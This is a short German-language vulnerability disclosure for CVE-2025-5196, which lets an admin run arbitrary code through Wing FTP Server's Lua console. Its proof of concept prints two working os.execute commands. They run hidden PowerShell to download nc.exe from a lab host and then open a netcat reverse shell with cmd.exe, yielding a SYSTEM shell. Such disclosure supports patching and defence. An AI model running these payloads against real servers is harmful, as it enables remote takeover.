
Wing FTP Server stellt eine administrative Lua-Skriptkonsole bereit, die über seine Weboberfläche zugänglich ist. Authentifizierte Administratoren können beliebigen Lua-Code mit unzureichendem Sandboxing ausführen. CVE-2025-5196
Wing FTP Server stellt eine administrative Lua-Skriptkonsole bereit, die über seine Weboberfläche zugänglich ist. Durch unzureichendes Sandboxing können authentifizierte Administratoren beliebigen Lua-Code ausführen.
Betroffene Version: Wing FTP Server 7.4.4 (Windows) | Authentifizierung erforderlich: Ja
Bis zum 24. Mai 2025 ist die neueste Version der vom Hersteller bereitgestellten Anwendung unter folgendem Link zu finden: https://www.wftpserver.com/download.htm
Darüber hinaus ist zu beachten, dass bis zum selben Datum ein Versionshinweis veröffentlicht wurde, der darüber informiert, dass die RCE-Schwachstelle in Version 7.4.4 behoben wurde. Der Link zu den Versionshinweisen ist hier zu finden: https://www.wftpserver.com/serverhistory.htm

PoC zu CVE-2025-5196 VulDB

Weboberfläche von Wing FTP Server


Der erste Teil des Befehls lädt die nc.exe (netcat für Windows x86) in den Pfad "C:\Users\usuario\Desktop\Drops" herunter. Der zweite Teil führt nc.exe 192.168.234.131 4443 -e cme.exe aus.
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

NT/SYSTEM-Shell
